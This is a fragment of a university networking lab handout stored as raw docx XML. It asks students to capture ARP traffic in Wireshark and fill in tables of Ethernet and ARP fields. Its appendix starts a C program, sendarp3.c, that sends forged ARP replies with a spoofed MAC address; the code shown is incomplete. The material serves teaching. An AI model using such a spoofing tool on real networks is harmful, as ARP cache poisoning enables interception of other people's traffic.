        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291B1A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291B1A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291B1A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, take screenshots of ARP request and reply packets. From the data shown by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291B1A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291B1A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, for ARP reques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t and reply messages.</w:t>
      </w:r>
      <w:r w:rsidRPr="00291B1A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRPr="00291B1A" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRPr="00291B1A" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Fill in </w:t>
      </w:r>
      <w:r w:rsidRPr="00291B1A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">all the fields of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00291B1A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ethernet  frame</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00291B1A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ARP packet using the following structures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (taken from  </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/Ethernet_frame</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/Address_Resolution_Protocol</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11199" w:type="dxa"/>
        <w:tblInd w:w="-1038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857"/>
        <w:gridCol w:w="1068"/>
        <w:gridCol w:w="917"/>
        <w:gridCol w:w="928"/>
        <w:gridCol w:w="1196"/>
        <w:gridCol w:w="1845"/>
        <w:gridCol w:w="998"/>
        <w:gridCol w:w="1188"/>
        <w:gridCol w:w="1216"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AD3004" w:rsidTr="00ED6016">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="1216" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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B17365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B1736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802.3 Ethernet packet and frame structure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 xml:space="preserve"> for ARP request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD3004" w:rsidTr="00ED6016">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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Preamble</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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Start of frame delimiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="91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MAC destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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MAC source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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2A03CF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hyperlink r:id="rId16" w:tooltip="802.1Q" w:history="1">
              <w:r w:rsidR="00AD3004"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802.1Q</w:t>
              </w:r>
            </w:hyperlink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tag (optional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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2A03CF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hyperlink r:id="rId17" w:tooltip="Ethertype" w:history="1">
              <w:r w:rsidR="00AD3004"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Ethertype</w:t>
              </w:r>
            </w:hyperlink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(</w:t>
            </w:r>
            <w:hyperlink r:id="rId18" w:tooltip="Ethernet II" w:history="1">
              <w:r w:rsidR="00AD3004"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Ethernet II</w:t>
              </w:r>
            </w:hyperlink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) or length (</w:t>
            </w:r>
            <w:r w:rsidR="00C61B55">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C61B55">
              <w:instrText xml:space="preserve"> HYPERLINK "https://en.wikipedia.org/wiki/IEEE_802.3" \o "IEEE 802.3" </w:instrText>
            </w:r>
            <w:r w:rsidR="00C61B55">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00AD3004">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0B0080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>IEEE 802.3</w:t>
            </w:r>
            <w:r w:rsidR="00C61B55">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0B0080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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2A03CF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hyperlink r:id="rId19" w:tooltip="Frame check sequence" w:history="1">
              <w:r w:rsidR="00AD3004"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Frame check sequence</w:t>
              </w:r>
            </w:hyperlink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(32</w:t>
            </w:r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noBreakHyphen/>
              <w:t>bit </w:t>
            </w:r>
            <w:hyperlink r:id="rId20" w:tooltip="Cyclic redundancy check" w:history="1">
              <w:r w:rsidR="00AD3004"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CRC</w:t>
              </w:r>
            </w:hyperlink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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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2A03CF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hyperlink r:id="rId21" w:tooltip="Interpacket gap" w:history="1">
              <w:r w:rsidR="00AD3004"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Interpacket gap</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD3004" w:rsidTr="00ED6016">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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7 </w:t>
            </w:r>
            <w:hyperlink r:id="rId22" w:tooltip="Octet (computing)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octets</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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 octet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="91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 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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(4 octets)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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46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noBreakHyphen/>
              <w:t>1500 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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Style w:val="nowrap"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>4 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD3004" w:rsidTr="00ED6016">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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7072" w:type="dxa"/>
            <w:gridSpan w:val="6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DD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</w:tr>
    </w:tbl>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9983" w:type="dxa"/>
        <w:tblInd w:w="-46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799"/>
        <w:gridCol w:w="4629"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AD3004" w:rsidRPr="0064386E" w:rsidTr="00ED6016">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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 xml:space="preserve">Internet Protocol (IPv4) over Ethernet ARP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 xml:space="preserve">Request </w:t>
            </w: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packet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Octet offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="379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462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1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Hardware type (HTYPE)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Protocol type (PTYPE)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79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Hardware address length (HLEN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="462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Protocol address length (PLEN)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Operation (OPER)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Sender hardware address (SHA) (first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lastRenderedPageBreak/>
              <w:t>10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(next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(last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0FFD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Sender protocol address (SPA) (first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0FFD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(last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18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Target hardware address (THA) (first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(next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22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(last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24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Target protocol address (TPA) (first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26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(last 2 bytes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AD3004" w:rsidRPr="00291B1A" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11199" w:type="dxa"/>
        <w:tblInd w:w="-1038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857"/>
        <w:gridCol w:w="1068"/>
        <w:gridCol w:w="917"/>
        <w:gridCol w:w="928"/>
        <w:gridCol w:w="1196"/>
        <w:gridCol w:w="1845"/>
        <w:gridCol w:w="998"/>
        <w:gridCol w:w="1188"/>
        <w:gridCol w:w="1216"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AD3004" w:rsidTr="00ED6016">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="1216" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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B17365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B1736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802.3 Ethernet packet and frame structure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 xml:space="preserve"> for ARP reply</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD3004" w:rsidTr="00ED6016">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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Preamble</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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Start of frame delimiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="91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MAC destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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MAC source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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2A03CF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hyperlink r:id="rId23" w:tooltip="802.1Q" w:history="1">
              <w:r w:rsidR="00AD3004"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802.1Q</w:t>
              </w:r>
            </w:hyperlink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tag (optional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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2A03CF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hyperlink r:id="rId24" w:tooltip="Ethertype" w:history="1">
              <w:r w:rsidR="00AD3004"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Ethertype</w:t>
              </w:r>
            </w:hyperlink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(</w:t>
            </w:r>
            <w:hyperlink r:id="rId25" w:tooltip="Ethernet II" w:history="1">
              <w:r w:rsidR="00AD3004"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Ethernet II</w:t>
              </w:r>
            </w:hyperlink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) or length (</w:t>
            </w:r>
            <w:r w:rsidR="00C61B55">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C61B55">
              <w:instrText xml:space="preserve"> HYPERLINK "https://en.wikipedia.org/wiki/IEEE_802.3" \o "IEEE 802.3" </w:instrText>
            </w:r>
            <w:r w:rsidR="00C61B55">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00AD3004">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0B0080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>IEEE 802.3</w:t>
            </w:r>
            <w:r w:rsidR="00C61B55">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0B0080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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2A03CF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hyperlink r:id="rId26" w:tooltip="Frame check sequence" w:history="1">
              <w:r w:rsidR="00AD3004"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Frame check sequence</w:t>
              </w:r>
            </w:hyperlink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(32</w:t>
            </w:r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noBreakHyphen/>
              <w:t>bit </w:t>
            </w:r>
            <w:hyperlink r:id="rId27" w:tooltip="Cyclic redundancy check" w:history="1">
              <w:r w:rsidR="00AD3004"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CRC</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00AD3004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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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2A03CF" w:rsidP="00ED601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hyperlink r:id="rId28" w:tooltip="Interpacket gap" w:history="1">
              <w:r w:rsidR="00AD3004">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink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Interpacket gap</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD3004" w:rsidTr="00ED6016">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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7 </w:t>
            </w:r>
            <w:hyperlink r:id="rId29" w:tooltip="Octet (computing)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octets</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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 octet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="91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 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="92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 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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(4 octets)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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46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noBreakHyphen/>
              <w:t>1500 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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Style w:val="nowrap"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>4 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD3004" w:rsidTr="00ED6016">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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7072" w:type="dxa"/>
            <w:gridSpan w:val="6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DD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AD3004" w:rsidRDefault="00AD3004" w:rsidP="00ED6016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</w:tr>
    </w:tbl>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9983" w:type="dxa"/>
        <w:tblInd w:w="-33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799"/>
        <w:gridCol w:w="4629"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AD3004" w:rsidRPr="0064386E" w:rsidTr="00ED6016">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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lastRenderedPageBreak/>
              <w:t xml:space="preserve">Internet Protocol (IPv4) over Ethernet ARP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 xml:space="preserve">Reply </w:t>
            </w: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packet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Octet offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="379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462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1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Hardware type (HTYPE)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Protocol type (PTYPE)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79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Hardware address length (HLEN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="462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Protocol address length (PLEN)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Operation (OPER)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Sender hardware address (SHA) (first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(next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(last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0FFD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Sender protocol address (SPA) (first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0FFD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(last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18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Target hardware address (THA) (first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(next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22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(last 2 bytes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD3004" w:rsidRPr="0064386E" w:rsidTr="00ED6016">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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tr-TR"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="842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004" w:rsidRPr="0064386E" w:rsidRDefault="00AD3004" w:rsidP="00ED60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64386E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Target protocol address (TPA) (first 2 bytes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD3004">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRPr="007567E5" w:rsidRDefault="00AD3004" w:rsidP="007567E5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007567E5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
      <w:r w:rsidR="007567E5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="007567E5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Sendarp3.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3004" w:rsidRDefault="00AD3004" w:rsidP="00AD30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bookmarkStart w:id="1" w:name="_Hlk197427205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//Adapted by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Ali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Farrokhnejad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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06</w:t>
      </w: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.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05.</w:t>
      </w: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20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25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002354E5" w:rsidRDefault="002354E5" w:rsidP="002354E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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002354E5" w:rsidRDefault="002354E5" w:rsidP="002354E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//Adapted by Alexander G. Chefranov 24.04.2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002354E5" w:rsidRDefault="002354E5" w:rsidP="002354E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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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*  Copyright</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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(C) 2011-2015  P.D. Buchan (pdbuchan@yahoo.com)</w:t>
      </w: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This program is free software: you can redistribute it and/or modify</w:t>
      </w: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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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under the terms of the GNU General Public License as published by</w:t>
      </w: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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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Free Software Foundation, either version 3 of the License, or</w:t>
      </w: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(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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at</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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your option) any later version.</w:t>
      </w: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This program is distributed in the hope that it will be useful,</w:t>
      </w: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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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but</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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WITHOUT ANY WARRANTY; without even the implied warranty of</w:t>
      </w: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MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the</w:t>
      </w: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GNU General Public License for more details.</w:t>
      </w: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You should have received a copy of the GNU General Public License</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00DB3" w:rsidRP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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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along</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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with this program.  If not, see &lt;http://www.gnu.org/licenses/&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00DB3" w:rsidRDefault="00F00DB3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  <w:r w:rsidRPr="00F00DB3"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*/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00860DD0" w:rsidRPr="00F00DB3" w:rsidRDefault="00860DD0" w:rsidP="00F00DB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</w:pPr>
    </w:p>
    <w:p w:rsidR="00BE4B1C" w:rsidRDefault="00F65E81" w:rsidP="00AD30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/*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Example Usage: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gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-o sendarp3 sendarp3.c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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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./sendarp3 p17p1 192.168.181.126 192.168.181.132 00:1f:d0:0f:98:77 00:11:22:33:44:55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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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./sendarp3 &lt;interface&gt; &lt;Source IP&gt; &lt;Destination IP&gt; &lt;Destination MAC&gt; &lt;Spoofed MAC&gt;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*/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stdio.h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stdlib.h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unistd.h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close(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),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usleep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()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string.h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spellStart"/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strncpy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),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memset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(),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memcpy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()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netdb.h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struct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addrinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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&lt;sys/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types.h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needed for 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socket(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), uint8_t, uint16_t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&lt;sys/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socket.h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needed for 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socket()</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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netinet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in.h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IPPROTO_RAW, INET_ADDRSTRLEN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netinet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ip.h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IP_MAXPACKET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arpa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inet.h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inet_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pton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()</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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&lt;sys/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ioctl.h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spellStart"/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ioctl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()</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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&lt;bits/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ioctls.h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spellStart"/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ioctl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) request values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&lt;net/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if.h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struct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ifreq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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linux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if_ether.h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ETH_P_ARP = 0x0806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linux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if_packet.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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struct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sockaddr_ll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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&lt;net/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ethernet.h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#include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errno.h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errno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, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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perror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()</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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ARP header structure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typedef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struct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  <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_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  <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arp_hdr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  <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arp_hdr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struct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  <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_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  <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arp_hdr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uint16_t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htype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;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Hardware type (e.g., 1 for Ethernet)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uint16_t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ptype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;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Protocol type (e.g., 0x0800 for IPv4)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uint8_t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hlen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;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Hardware address length (6 for MAC)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uint8_t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plen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;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Protocol address length (4 for IPv4)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uint16_t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opcode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;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Operation code (1 = request, 2 = reply)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uint8_t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sender_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6];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Sender MAC address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uint8_t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sender_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ip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4];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Sender IP address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uint8_t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target_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6];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Target MAC address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uint8_t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target_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ip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4];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Target IP address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lastRenderedPageBreak/>
        <w:t>};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Constants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#define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ETH_HDRLEN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14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Ethernet header length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#define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ARP_HDRLEN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28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ARP header length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#define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ARPOP_REPLY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2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ARP reply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opcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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#define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MAX_MAC_STR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18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Length of MAC address string (e.g., "00:11:22:33:44:55")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#define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SEND_COUNT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10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Number of ARP replies to send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#define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SEND_DELAY_US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100000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Delay between sends (100ms)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Parse MAC address string (e.g., "00:11:22:33:44:55") into uint8_t array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parse_mac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const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char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*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mac_str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uint8_t *</w:t>
      </w:r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mac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unsigned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bytes[6];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if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sscanf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mac_str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"%x:%x:%x:%x:%x:%x"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&amp;bytes[0], &amp;bytes[1], &amp;bytes[2],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       &amp;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bytes[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3], &amp;bytes[4], &amp;bytes[5]) != 6)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return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-1;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for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0;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&lt; 6;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++)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(bytes[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] &gt; 0xFF)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return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-1;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mac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] = (uint8_t)bytes[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];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return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0;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main(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argc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char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**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argv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status,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frame_length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bytes;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  <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arp_hdr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arphdr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struct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  <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>addrinfo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hints, *res;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struct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  <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sockaddr_in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*ipv4;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struct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  <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sockaddr_ll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device;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struct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  <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ifreq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ifr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char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interface[40],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src_ip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[INET_ADDRSTRLEN], target[INET_ADDRSTRLEN];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uint8_t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6],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dst_mac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[6],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spoofed_mac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[6],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ether_frame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[IP_MAXPACKET];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Validate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command-line arguments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argc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!= 6)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fprintf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stderr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"Usage: %s &lt;interface&gt; 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source_ip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 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target_ip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 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target_mac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 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spoofed_mac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&gt;\n"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argv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[0]);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fprintf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stderr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"Example: %s eth0 192.168.181.126 192.168.181.132 00:1f:d0:0f:98:77 00:11:22:33:44:55\n"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argv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[0]);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exit(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EXIT_FAILURE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Copy arguments safely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strncpy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interface, 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argv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[1],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sizeof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(interface) - 1);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interface[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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sizeof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(interface) - 1] =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'\0'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strncpy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src_ip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argv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[2],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sizeof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src_ip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 - 1);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ip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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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sizeof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src_ip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) - 1] =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'\0'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strncpy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target, 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argv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[3],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sizeof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(target) - 1);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target[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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sizeof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(target) - 1] =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'\0'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Parse target and spoofed MAC addresses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parse_mac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argv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[4],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dst_mac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 != 0)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fprintf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stderr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"Invalid target MAC address: %s\n"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argv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[4]);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exit(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EXIT_FAILURE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parse_mac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argv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[5],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spoofed_mac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 != 0)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fprintf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stderr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"Invalid spoofed MAC address: %s\n"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  <w:lang w:val="en-US"/>
        </w:rPr>
